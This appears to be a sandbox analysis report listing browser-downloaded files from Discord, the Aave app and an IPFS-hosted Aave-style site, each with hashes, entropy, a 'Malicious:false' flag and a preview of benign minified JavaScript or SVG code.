                                                                                                                                                                                                                                                  SHA1:FEFFB7CB5F92239332C1F759B15700C45A088026
                                                                                                                                                                                                                                                  SHA-256:BC2C14A038FBD74724FFC9F6907EF35AE2955FDCACE8D694BF22355624B7E521
                                                                                                                                                                                                                                                  SHA-512:4E147073159BCB18EA5403F74E1F9F34FE57A66AE60C967F622A4F77D1E04AA5526D9E638DC993B718CFB352BD7AEEB36E8047F6DDAA9317DDD7833586D1B0FC
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/44754ba5aa3d478d8c43.js
                                                                                                                                                                                                                                                  Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["96427"],{473452:function(e,t){"use strict";t.Z=function(e){for(var t,n=e.length,o=n^n,r=0;n>=4;)t=(65535&(t=255&e.charCodeAt(r)|(255&e.charCodeAt(++r))<<8|(255&e.charCodeAt(++r))<<16|(255&e.charCodeAt(++r))<<24))*1540483477+(((t>>>16)*1540483477&65535)<<16),t^=t>>>24,o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16)^(t=(65535&t)*1540483477+(((t>>>16)*1540483477&65535)<<16)),n-=4,++r;switch(n){case 3:o^=(255&e.charCodeAt(r+2))<<16;case 2:o^=(255&e.charCodeAt(r+1))<<8;case 1:o^=255&e.charCodeAt(r),o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16)}return o^=o>>>13,o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16),((o^=o>>>15)>>>0).toString(36)}},230371:function(e,t){"use strict";t.Z=function(e){var t={};return function(n){return void 0===t[n]&&(t[n]=e(n)),t[n]}}},184826:function(e,t){"use strict";t.Z=function(e){function t(e,t,o){var r=t.trim().split(h);t=r;var i=r.length,a=e.length;switch(a){case
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3481)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):3530
                                                                                                                                                                                                                                                  Entropy (8bit):5.525597791927395
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:4SloopsVL5u5CfGRxnDFzmThAlvnPE17cXfXTrI1iQhTTrUE7qp6upMNqsykTHuV:CokFVfMD04DvEbrOp6udE6ezfkjj
                                                                                                                                                                                                                                                  MD5:BE6064FF8C1D480AFB80FE48762A06C1
                                                                                                                                                                                                                                                  SHA1:F832A784FAEDB0BCFEE78661031D3C23C622501A
                                                                                                                                                                                                                                                  SHA-256:3666E614B6564F13247BF5E53B0DD5C57F27ED75F397AA839F4B75BF55177203
                                                                                                                                                                                                                                                  SHA-512:78E847E48E1A509B9E01550B10A94EA77D4D6BD9208131DD52FFAA379150660A2B7BA11750CA87173FDE4EB75A99512BC98ABDD6593D47DC1A0B8886905DF08E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var r={504053:function(r,t,e){e.d(t,{F:function(){return o}}),e(518263),e(970173),e(520712),e(268111),e(941497),e(32026),e(480839),e(744285),e(492257),e(873817),e(863942),e(642549),e(653041);var n=e(788900);function o(r){let t=function(r){let{detail:t=1,pop:e=1}=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},{PI:o,min:f,max:i,cos:u,round:a}=Math,c=r[0]|r[1]<<8|r[2]<<16,l=r[3]|r[4]<<8,s=(63&c)/63,p=(c>>6&63)/31.5-1,d=(c>>12&63)/31.5-1,v=c>>23,h=l>>15,b=i(3,h?v?5:7:7&l),g=i(3,h?7&l:v?5:7),y=v?(15&r[5])/15:1,O=(r[5]>>4)/15,m=v?6:5,w=0,x=(t,e,n)=>{let o=[];for(let f=0;f<e;f++)for(let i=f?0:1;i*e<t*(e-f);i++)o.push(((r[m+(w>>1)]>>((1&w++)<<2)&15)/7.5-1)*n);return o},j=x(b,g,(c>>18&31)/31/2),k=x(3,3,(l>>3&63)/63*e),P=x(3,3,(l>>9&63)/63*e),_=v?x(5,5,O):[],A=(0,n.UN)(r),C=a(A>1?32:32*A),F=a(A>1?32/A:32),M=new Uint8Array(C*F*4),U=[],T=[];for(let r=0,e=0;r<F;r++)for(let n=0;n<C;n++,e+=4){let a=s,c=p,l=d,h=y;for(let r=0,t=i(b,v?5:3);r<t;r++)U[r]=u(o/C*(n+.5)*r);for(l
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5383), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):5383
                                                                                                                                                                                                                                                  Entropy (8bit):5.407192806801637
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:7g7XsxinWZT77nX2SdAxCc5j0AgRI3pSgXpSgkVQZ/clfA/bBckwOZOX0C+38y:e8xiWl77nXndAxCc5gAfdkVQNclfA/bx
                                                                                                                                                                                                                                                  MD5:A906457543407A440EEB7CEFF65CE2C5
                                                                                                                                                                                                                                                  SHA1:C703D13449CEBAE2CD8BB494877CE8FB89915870
                                                                                                                                                                                                                                                  SHA-256:D015C44415D90338A85BFB03F14DC97DA33980E85DC27EDFFF46D47BEA0C53E6
                                                                                                                                                                                                                                                  SHA-512:650A6B576F52A4C6A8C8DC3482DF7B94CAB3FF97F4D5B6E95C7A3C5FE9359061CE6B2656D68D2D055746DAE830E48599A8FE19ED6B09F90D516DA66951437746
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/9072-51cf922cfdeaf6b4.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9072],{79072:function(e,n,t){t.d(n,{ZP:function(){return N}});var r=t(63366),i=t(87462),o=t(67294),a=t(86010),s=t(95408),c=t(39707),p=t(94780),u=t(81719),l=t(78884),m=t(62097);var d=o.createContext(),f=t(34867);function g(e){return(0,f.Z)("MuiGrid",e)}const w=["auto",!0,1,2,3,4,5,6,7,8,9,10,11,12];var h=(0,t(1588).Z)("MuiGrid",["root","container","item","zeroMinWidth",...[0,1,2,3,4,5,6,7,8,9,10].map((e=>`spacing-xs-${e}`)),...["column-reverse","column","row-reverse","row"].map((e=>`direction-xs-${e}`)),...["nowrap","wrap-reverse","wrap"].map((e=>`wrap-xs-${e}`)),...w.map((e=>`grid-xs-${e}`)),...w.map((e=>`grid-sm-${e}`)),...w.map((e=>`grid-md-${e}`)),...w.map((e=>`grid-lg-${e}`)),...w.map((e=>`grid-xl-${e}`))]),x=t(85893);const b=["className","columns","columnSpacing","component","container","direction","item","rowSpacing","spacing","wrap","zeroMinWidth"];function $(e){const n=parseFloat(e);return`${n}${String(e).rep
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (31247), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):31247
                                                                                                                                                                                                                                                  Entropy (8bit):5.421289532846775
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:NyPI6P6BjOCykXONiX3ag7453qTopffYjXcf+:pBB6C3xj4hY
                                                                                                                                                                                                                                                  MD5:65530C93E8EAD446E49034B8461C6DAE
                                                                                                                                                                                                                                                  SHA1:BAF214C264549C8444E7D5ED07447747DD8D4CD3
                                                                                                                                                                                                                                                  SHA-256:0BB44921ADCA7646D97719E310D84A6DB7E089C4D3EF05FFB6AEF0584D032826
                                                                                                                                                                                                                                                  SHA-512:546687A03037B7893F7C80D0B04266A2DF197D241705920928AB8D29E936B77C849810EA8DB8484C29E3A0D0F27E713593E669FE9DB3E63693BA4ED8FB9A4F0F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/523.a7e983d8dea8db71.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[523],{62753:function(e,n,r){var t=r(64836);n.Z=void 0;var i=t(r(64938)),o=r(85893),s=(0,i.default)((0,o.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");n.Z=s},89722:function(e,n,r){r.d(n,{Z:function(){return h}});var t=r(87462),i=r(63366),o=r(67294),s=r(86010),a=r(94780),c=r(81719),l=r(78884),u=r(36622),d=r(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=r(85893);const x=["baseClassName","classNam
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):688
                                                                                                                                                                                                                                                  Entropy (8bit):4.422809447424027
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:t6AbzVKIh4zXvVg/jzDJU0uE2pLAZTX9D1jPb1qcNRxU7EK53TQke:tDbzVKwkXveLPC0uWZjR1LhFFkxhe
                                                                                                                                                                                                                                                  MD5:C6CE0010471B65C0FAEDA6C53AB297BD
                                                                                                                                                                                                                                                  SHA1:8735052DE92D694B4EA91CECCAB0E7E8F75A3CC7
                                                                                                                                                                                                                                                  SHA-256:862046FEE1B4F3744F000347CC0B337871967B2BD9471BCB6DDED2A49A61C527
                                                                                                                                                                                                                                                  SHA-512:7A054A7E19F80F7735CCDBC13E9CAFA13A779764C1725161B4EC7D3C793CFFB2E56C61109AA5F09A21E9DE3FD46B2E2EC756A6B03E46F4760125D282C14273C4
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg fill="none" height="12" viewBox="0 0 13 12" width="13" xmlns="http://www.w3.org/2000/svg"><path d="m5.39011.540027c.35536-.720037 1.38211-.720036 1.73747.000002l1.18359 2.398201c.14111.28593.41388.48411.72942.52996l2.64661.38457c.7946.11546 1.1119 1.09196.5369 1.65243l-1.9151 1.86674c-.2283.22257-.33252.54323-.2786.8575l.4521 2.63587c.1357.7914-.69496 1.3949-1.40567 1.0213l-2.36717-1.2445c-.28223-.1484-.6194-.1484-.90162 0l-2.36717 1.2445c-.71072.3736-1.54138-.2299-1.40565-1.0213l.45209-2.63587c.0539-.31427-.05029-.63493-.27861-.8575l-1.915083-1.86674c-.574984-.56047-.2576998-1.53697.536908-1.65243l2.646575-.38457c.31554-.04585.58831-.24403.72943-.52996z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15405), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):15405
                                                                                                                                                                                                                                                  Entropy (8bit):5.283283772460458
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:Gpv07TvQbuLzxFr+twp/xAvMl3sj4DhcU1PSHhKdKsO:Gpv07TvQbuL/r+Wp/xAvMl3scDqU1PSX
                                                                                                                                                                                                                                                  MD5:09F41FD89125DE512EF1143581A2C365
                                                                                                                                                                                                                                                  SHA1:4511A9945A20F0C253EE8611987F3F012AE2BFA2
                                                                                                                                                                                                                                                  SHA-256:04FC7F398FC64695B772B291652CDA5ACE6E2E9A45D78015B8E4C73BB458C82A
                                                                                                                                                                                                                                                  SHA-512:DC8CD94F4D98E8047CB9FCBFBF24610CE9A9D42F3165163FC5205C5EB3AD5F87E6C645DCB6176A0F5152AC7399EA02C3439B899556F21FA19D2D4305EDBF631A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4506],{75158:function(e,t,r){r.d(t,{Z:function(){return M}});var n=r(63366),l=r(87462),o=r(67294),c=r(86010),i=r(94780),a=r(41796),s=r(37743),p=r(54235),d=r(85893),f=(0,p.Z)((0,d.jsx)("path",{d:"M19 5v14H5V5h14m0-2H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2z"}),"CheckBoxOutlineBlank"),u=(0,p.Z)((0,d.jsx)("path",{d:"M19 3H5c-1.11 0-2 .9-2 2v14c0 1.1.89 2 2 2h14c1.11 0 2-.9 2-2V5c0-1.1-.89-2-2-2zm-9 14l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z"}),"CheckBox"),y=(0,p.Z)((0,d.jsx)("path",{d:"M19 3H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm-2 10H7v-2h10v2z"}),"IndeterminateCheckBox"),h=r(36622),m=r(78884),x=r(81719),k=r(34867);function O(e){return(0,k.Z)("MuiCheckbox",e)}var v=(0,r(1588).Z)("MuiCheckbox",["root","checked","disabled","indeterminate","colorPrimary","colorSecondary"]);const j=["checkedIcon","color","icon","indeterminate","indeterminateIcon","inputProp
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2396), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2396
                                                                                                                                                                                                                                                  Entropy (8bit):5.217498919488569
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:ZJdEUcMhQelIvowEBF6SewIu2y6scjv6QxOQsVayOewnIJVzz0lXqFWrCZYbRsW+:hlI+BFDJIuRUl0ayrwnyVzTAgMy
                                                                                                                                                                                                                                                  MD5:74D4EF3CE343E94E59F435F5510A5DCC
                                                                                                                                                                                                                                                  SHA1:06723D4AA9891349F909CE32B72E4E5207DAC1C8
                                                                                                                                                                                                                                                  SHA-256:71E7F045231AE5BD9CE94A34D95115A47E221CCC06D6D5BDF88B70DD5069ECBA
                                                                                                                                                                                                                                                  SHA-512:FEAB26FC04FD78090C107BA8A0F4291397F0275F90E5A3C0205F75864E9455F27D60EDA1B844BFC8F052407888AF625B9388BC80000D3E8130CAAA3E304EF860
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:self.__BUILD_MANIFEST=function(s,a,c,e,t,i,n,r,f,b,k,u,h,d){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[c,"static/chunks/4254-a9fee39d0c27297f.js","static/chunks/1573-e710bb2ca0646568.js",e,s,t,"static/chunks/9447-905d9c1c85542ff2.js",f,b,"static/chunks/pages/index-92ce489f6f7c51ed.js"],"/404":["static/chunks/pages/404-87ceb2d67c45a515.js"],"/500":["static/chunks/pages/500-b8751251f53c624c.js"],"/_error":["static/chunks/pages/_error-f7c9e698edebedd1.js"],"/bridge":[i,"static/chunks/9421-897510efb226106c.js",s,"static/chunks/pages/bridge-96a3176227b9387f.js"],"/faucet":[s,"static/chunks/pages/faucet-e11792d8635e9166.js"],"/governance":[n,a,i,r,k,"static/chunks/1315-7550bff8c0343bd6.js",u,"static/chunks/pages/governance-a17757b11c661747.js"],"/governance/ipfs-preview":[n,a,r,h,d,"static/chunks/pages/governance/ipfs-preview-14257c86a6d676db.js"],"/governance/v3/proposal":[n,a,i,r,h,d,"static/chunks/4343-05f12c64e4ca8ab6.js",u,"static/chunks/pages/governance/v3/propos
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):137
                                                                                                                                                                                                                                                  Entropy (8bit):4.832107377824175
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:t6WH7W+lFAATcvcmJDmJS4RKb5KVErcHrFvR8hiJqGrqL0:t6Abli/c8mc4slmrFv2hiAe
                                                                                                                                                                                                                                                  MD5:70275FE3104CF1D3388586AD8FFD478E
                                                                                                                                                                                                                                                  SHA1:473EA46F5B22B5C7D14C39EE9C0C82811593883B
                                                                                                                                                                                                                                                  SHA-256:3269CF3FDA7681388472225BAD39B6BB3B26088A0A03B6CD5796195F0114CE13
                                                                                                                                                                                                                                                  SHA-512:044C0F8F1583FAEBA3A23FF2DF821A5A0E79C548DB3A6474614894DA2CB125476227407F865CF20D32DC7E4D9ADE09EBA6317EFB787EEED2570C0EBDFC401D2A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/af5116b1db004acbdb8b.svg
                                                                                                                                                                                                                                                  Preview:<svg fill="none" height="8" viewBox="0 0 9 8" width="9" xmlns="http://www.w3.org/2000/svg"><path d="m4.5 0 4.5 8h-9z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                                                  Entropy (8bit):4.908001362735867
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:t4KA/YaGdGQzKO8OH8d8mvQ56TpmVVdEC0WpZVvPuJu:0/yEQzrGHvQUQ/G/WVvPau
                                                                                                                                                                                                                                                  MD5:51BB7508DB9048ED6A433DF91ACBE31C
                                                                                                                                                                                                                                                  SHA1:0B0F4FE43A282F6967EF26CEC27D9D39E000A8BD
                                                                                                                                                                                                                                                  SHA-256:A8E257F67B746F310E13D654B2B66EF0B5C99F110F361004EFAA53942A7A92A5
                                                                                                                                                                                                                                                  SHA-512:AE7AAAF33864FE2750696C79EF5B2F3EFB7AACD23028EDC13F925D7872B1E2902F78807F5B0C34C63E3AD554B13F60007ECD267DB7059FE86153705FCA8F4C32
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" data-name="Group 27021" viewBox="0 0 24 24"><defs><linearGradient id="a" x1=".907" x2=".163" y1=".227" y2=".853" gradientUnits="objectBoundingBox"><stop offset="0" stop-color="#b6509e"/><stop offset="1" stop-color="#2ebac6"/></linearGradient></defs><circle cx="12" cy="12" r="12" fill="url(#a)" data-name="Ellipse 991"/><path fill="#fff" d="m17.251 16.78-4.059-9.809a1.091 1.091 0 0 0-1.017-.755h-.359a1.091 1.091 0 0 0-1.017.755l-1.766 4.274H7.697a.731.731 0 0 0-.728.725v.01a.731.731 0 0 0 .728.725h.718L6.73 16.78a.86.86 0 0 0-.05.278.767.767 0 0 0 .2.547.7.7 0 0 0 .539.209.729.729 0 0 0 .419-.139.885.885 0 0 0 .289-.368l1.853-4.601h1.287a.731.731 0 0 0 .728-.725v-.02a.731.731 0 0 0-.728-.725h-.687l1.415-3.529 3.859 9.6a.885.885 0 0 0 .289.368.729.729 0 0 0 .419.139.7.7 0 0 0 .539-.209.767.767 0 0 0 .2-.547.657.657 0 0 0-.05-.278z" data-name="Path 2434"/></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):155120
                                                                                                                                                                                                                                                  Entropy (8bit):5.605855860453334
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:oJlKDHkaoiDJKO/ufj1TSPvXUxeaUl52I7MeLKt5adoOZW/u8WJzccZVrrw7xzIJ:xkNhBivFaS52IxalbcZxc7hucw
                                                                                                                                                                                                                                                  MD5:E869561F71A338B32BEDDCFEAE40135B
                                                                                                                                                                                                                                                  SHA1:48319D60549B0A880DE73043BF9E445B55D948D0
                                                                                                                                                                                                                                                  SHA-256:373050D4DA17E4E9116A1E8BE88674B308AC420784BF4017BCB2BF71AD510638
                                                                                                                                                                                                                                                  SHA-512:03A632CEF5AA88D1723CE9024B9E0780E7F048363EE0ABF80639EF6853C68718BDCC3DDC7CCADCA4B060351A97A1B49A3F2F18A48E340451CD24CF68C1366BDD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/6932d272acd867e3b6e3.js
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["86684"],{863942:function(e,t,n){var s=n(22092);(0,n(192291).exportTypedArrayStaticMethod)("from",n(12367),s)},70519:function(e){e.exports="/assets/76a4af59aa173c519461.svg"},806848:function(e){e.exports="/assets/6183fdc13d8046fd5bda.svg"},512266:function(e){e.exports="/assets/a2d51a24d014f52f83a6.png"},105020:function(e){e.exports="/assets/89ea0e62d0f8ffa67a17.svg"},211095:function(e){e.exports="/assets/86755fd1deda5cb45518.svg"},640356:function(e){e.exports="/assets/3880dc73d6be9d91ef36.svg"},515695:function(e){e.exports="/assets/450a761db3bfe89ca9b9.png"},892235:function(e){e.exports="/assets/48f03d965f1e82275006.svg"},375673:function(e){e.exports="/assets/3cf7f333e815240d3294.svg"},73962:function(e){e.exports="/assets/ed7318a94c14ce41d11d.svg"},689411:function(e){e.exports="/assets/831c999494cb5e095eae.svg"},2984:function(e){e.exports="/assets/0e5029fd9cd4812b6712.svg"},575703:function(e){e.exports=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13906), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13906
                                                                                                                                                                                                                                                  Entropy (8bit):5.4663568406518985
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:A7CoTpcO9I8QmaTohCsrWkJU2xbzxpozwsW1:A7CouO98mQohCsbJU2/onW1
                                                                                                                                                                                                                                                  MD5:8D1F977FD82709CE4AD7E20726C52A9D
                                                                                                                                                                                                                                                  SHA1:4B235975E256D6392FB149BFB432D3420E92F163
                                                                                                                                                                                                                                                  SHA-256:3A9136BC8E2EF8CE010043C0F98F6444DCF3D408D85A1390DD9D7559990D7BC4
                                                                                                                                                                                                                                                  SHA-512:021FD2153B1CA1E442206F0124872760B86A710185BDEC23DD30261BC4F251D27C295946545590E848FE5170F550F17D7522C43ECBCB5A9A6F6400E54C6A43A4
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9689],{81902:function(e,t,n){var r;n.d(t,{R:function(){return r}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(r||(r={}))},25049:function(e,t,n){n.d(t,{Y:function(){return d}});var r=n(59499),o=n(4730),a=n(49501),s=n(81902),i=n(58527),c=n(85893),l=["capType"];function p(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function u(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?p(Object(n),!0).forEach((function(t){(0,r.Z)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):p(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}var d=function(e){var t=e.capType,n=(0,o.Z)(e,l),r=t===s.R.supplyCap?(0,
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12924), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):12924
                                                                                                                                                                                                                                                  Entropy (8bit):5.203577157748669
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:Nvh8g0JFC25gGTV6C3RN3sNzU8oVyF36QLm1Sx2pOsYZMso:NvqDC2l6QsN48oVPQ5gYseMX
                                                                                                                                                                                                                                                  MD5:D850E190CE84C391F351FC30DC658F59
                                                                                                                                                                                                                                                  SHA1:E2F2F4AC8A8ADC1BC844A049250DCFAE19CB0C10
                                                                                                                                                                                                                                                  SHA-256:50CA3CC41C9BED4B3940FBF57F56036633FD7DF46F8AC36212479F292038A0C5
                                                                                                                                                                                                                                                  SHA-512:72D85E220237D3BE7CCF1FF54731E4AA77A4F9FA2503BCDC8D95D1C773282FA8E8D512546A0B2758197C984283B8EF18F3282347FA150C1281B4A73812CE7FC7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1315],{89722:function(e,t,r){"use strict";r.d(t,{Z:function(){return g}});var o=r(87462),n=r(63366),s=r(67294),i=r(86010),a=r(94780),l=r(81719),u=r(78884),c=r(36622),h=r(34867);function p(e){return(0,h.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var d=r(85893);const f=["baseClassName","className","color","component","fontSize"],v=(0,l.ZP)("span",{name:"MuiIcon",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:r}=e;return[t.root,"inherit"!==r.color&&t[`color${(0,c.Z)(r.color)}`],t[`fontSize${(0,c.Z)(r.fontSize)}`]]}})((({theme:e,ownerState:t})=>({userSelect:"none",width:"1em",height:"1em",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11062), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):11062
                                                                                                                                                                                                                                                  Entropy (8bit):5.361333092820621
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:FDvhWS51K6q4NqMw1AkVYwmW+2YjjBb/KLnRnJh9:jHrNLFBb/KLnRnJh9
                                                                                                                                                                                                                                                  MD5:A43D1BC01F17C751521E0D6B0FB3AFD2
                                                                                                                                                                                                                                                  SHA1:FC984E69D6B6744C976F492A5338AF8114C3837D
                                                                                                                                                                                                                                                  SHA-256:E40F42A162C73CF41BDE24A6C4C7B410CB402648926F0243CAD0EF6A5435D6F6
                                                                                                                                                                                                                                                  SHA-512:71FDC0ACA6961DC1E359A7C498E8E63ADC6F832A05258B84C1975BAE04A9049B772660CD7FF5BBFC501A94E64FFEFB5B7C2265F17AC553D829DD211EAA1C8717
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/4787.c9a9f6a64640a9a2.js
